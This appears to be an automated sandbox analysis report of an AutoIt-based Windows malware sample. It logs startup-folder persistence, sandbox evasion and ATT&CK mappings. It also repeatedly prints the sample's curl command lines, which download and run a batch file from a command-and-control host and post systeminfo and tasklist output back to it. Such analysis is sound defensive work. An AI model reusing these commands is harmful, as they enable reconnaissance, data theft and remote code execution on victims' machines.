Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C4465736B746F705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 0" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 3" -Lo "C:\Users\user\AppData\Local\Temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -Lo "C:\Users\user\AppData\Local\Temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c "C:\Users\user\AppData\Local\Temp\tmp.bat" > C:\Users\user\AppData\Local\Temp\tmp.txt Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -H "X-Reply: 1" -A "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Edg/130.0.2849.80" -H "X-Referer: 433A5C55736572735C616C666F6E735C417070446174615C526F616D696E675C4D6963726F736F66745C57696E646F77735C5374617274204D656E755C50726F6772616D735C537461727475705C66696C652E657865" -X POST -H "X-Auth: 2F414C464F4E532D50432F616C666F6E732F32" -H "X-Sec-Id: 1" --data-binary @"C:\Users\user\AppData\Local\Temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\systeminfo.exe systeminfoJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/"
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c4465736b746f705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 0" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 3" -lo "c:\users\user\appdata\local\temp\tmp.ini" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -lo "c:\users\user\appdata\local\temp\tmp.bat" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\curl.exe curl --insecure -k -h "x-reply: 1" -a "mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/132.0.0.0 safari/537.36 edg/130.0.2849.80" -h "x-referer: 433a5c55736572735c616c666f6e735c417070446174615c526f616d696e675c4d6963726f736f66745c57696e646f77735c5374617274204d656e755c50726f6772616d735c537461727475705c66696c652e657865" -x post -h "x-auth: 2f414c464f4e532d50432f616c666f6e732f32" -h "x-sec-id: 1" --data-binary @"c:\users\user\appdata\local\temp\tmp.txt" "https://peerhost59mj7i6macla65r.com/search/" Jump to behavior
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00240B62 GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,0_2_00240B62
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00241663 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00241663
Source: file.exe, file.exe.11.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exeBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00200698 cpuid 0_2_00200698
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00258195 GetLocalTime,SystemTimeToFileTime,LocalFileTimeToFileTime,GetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,0_2_00258195
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0023D27A GetUserNameW,0_2_0023D27A
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0021B952 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,0_2_0021B952
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_001E42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_001E42DE

Stealing of Sensitive Information

barindex
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txt
Source: C:\Users\user\Desktop\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c systeminfo > tmp.txt && tasklist >> tmp.txtJump to behavior
Source: file.exeBinary or memory string: WIN_81
Source: file.exeBinary or memory string: WIN_XP
Source: file.exe.11.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
Source: file.exeBinary or memory string: WIN_XPe
Source: file.exeBinary or memory string: WIN_VISTA
Source: file.exeBinary or memory string: WIN_7
Source: file.exeBinary or memory string: WIN_8
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00261204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00261204
Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00261806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00261806
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005C1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,20_2_005C1204
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exeCode function: 20_2_005C1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,20_2_005C1806
ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting
2
Valid Accounts
231
Windows Management Instrumentation
1
Scripting
1
Exploitation for Privilege Escalation
1
Disable or Modify Tools
21
Input Capture
2
System Time Discovery
Remote Services1
Archive Collected Data
2
Ingress Tool Transfer
Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts1
Native API
1
DLL Side-Loading
1
DLL Side-Loading
1
Deobfuscate/Decode Files or Information
LSASS Memory1
Account Discovery
Remote Desktop Protocol21
Input Capture
11
Encrypted Channel
Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts1
Command and Scripting Interpreter
2
Valid Accounts
2
Valid Accounts
2
Obfuscated Files or Information
Security Account Manager4
File and Directory Discovery
SMB/Windows Admin Shares3
Clipboard Data
3
Non-Application Layer Protocol
Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron12
Registry Run Keys / Startup Folder
21
Access Token Manipulation
1
DLL Side-Loading
NTDS147
System Information Discovery
Distributed Component Object ModelInput Capture14
Application Layer Protocol
Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection
1
Masquerading
LSA Secrets341
Security Software Discovery
SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts12
Registry Run Keys / Startup Folder
2
Valid Accounts
Cached Domain Credentials24
Virtualization/Sandbox Evasion
VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items24
Virtualization/Sandbox Evasion
DCSync3
Process Discovery
Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
Access Token Manipulation
Proc Filesystem11
Application Window Discovery
Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt12
Process Injection
/etc/passwd and /etc/shadow1
System Owner/User Discovery
Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1573844 Sample: file.exe Startdate: 12/12/2024 Architecture: WINDOWS Score: 100 57 peerhost59mj7i6macla65r.com 2->57 63 Suricata IDS alerts for network traffic 2->63 65 Multi AV Scanner detection for dropped file 2->65 67 Multi AV Scanner detection for submitted file 2->67 69 7 other signatures 2->69 8 file.exe 2->8         started        11 file.exe 2->11         started        signatures3 process4 signatures5 71 Binary is likely a compiled AutoIt script file 8->71 73 Found API chain indicative of sandbox detection 8->73 75 Gathers system information via systeminfo 8->75 13 cmd.exe 2 8->13         started        16 curl.exe 1 8->16         started        19 cmd.exe 2 8->19         started        28 4 other processes 8->28 22 cmd.exe 2 11->22         started        24 curl.exe 1 11->24         started        26 curl.exe 1 11->26         started        30 3 other processes 11->30 process6 dnsIp7 77 Drops PE files to the startup folder 13->77 32 systeminfo.exe 2 1 13->32         started        43 2 other processes 13->43 53 peerhost59mj7i6macla65r.com 94.154.172.218, 443, 49720, 49725 LVLT-10753US Germany 16->53 55 127.0.0.1 unknown unknown 16->55 35 conhost.exe 16->35         started        51 C:\Users\user\AppData\Roaming\...\file.exe, PE32 19->51 dropped 37 conhost.exe 19->37         started        45 3 other processes 22->45 39 conhost.exe 24->39         started        41 conhost.exe 26->41         started        47 4 other processes 28->47 49 3 other processes 30->49 file8 signatures9 process10 signatures11 59 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 32->59 61 Writes or reads registry keys via WMI 32->61

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
SourceDetectionScannerLabelLink
file.exe29%ReversingLabs
file.exe100%Joe Sandbox ML
SourceDetectionScannerLabelLink
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe100%Joe Sandbox ML
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\file.exe29%ReversingLabs
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
https://peerhost59mj7i6macla65r.com/search/::z0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/%0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/K0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/Bi0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/--0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/H0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C50%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/5iu0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/440%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/bB0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/E-H0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/g_0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/cb0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/n64;0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/70%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/735C4465736B746F705C66696C652E6578650%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/cur32.dll0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/W0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/T0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/;0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/Ti0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/c0%Avira URL Cloudsafe
https://peerhost59mj7i6macla65r.com/search/ow-0%Avira URL Cloudsafe
NameIPActiveMaliciousAntivirus DetectionReputation
peerhost59mj7i6macla65r.com
94.154.172.218
truetrue
    unknown
    NameMaliciousAntivirus DetectionReputation
    https://peerhost59mj7i6macla65r.com/search/true
    • Avira URL Cloud: safe
    unknown
    NameSourceMaliciousAntivirus DetectionReputation
    https://peerhost59mj7i6macla65r.com/search/%file.exe, 00000000.00000002.3389486145.0000000001048000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/735C417070446174615C526F616D696E675C4D6963726F736F66745C5file.exe, 00000014.00000003.2377965624.00000000016F6000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/::zcurl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Hcurl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Kcurl.exe, 0000001D.00000002.2454822807.0000000003738000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/Bicurl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/--curl.exe, 00000011.00000002.2301039187.00000000032A9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/44curl.exe, 00000007.00000002.2209174796.0000000003078000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/bBcurl.exe, 0000001B.00000002.2429446057.00000000008B9000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
    https://peerhost59mj7i6macla65r.com/search/5iucurl.exe, 0000000C.00000002.2275900755.0000000003328000.00000004.00000020.00020000.00000000.sdmpfalse
    • Avira URL Cloud: safe
    unknown
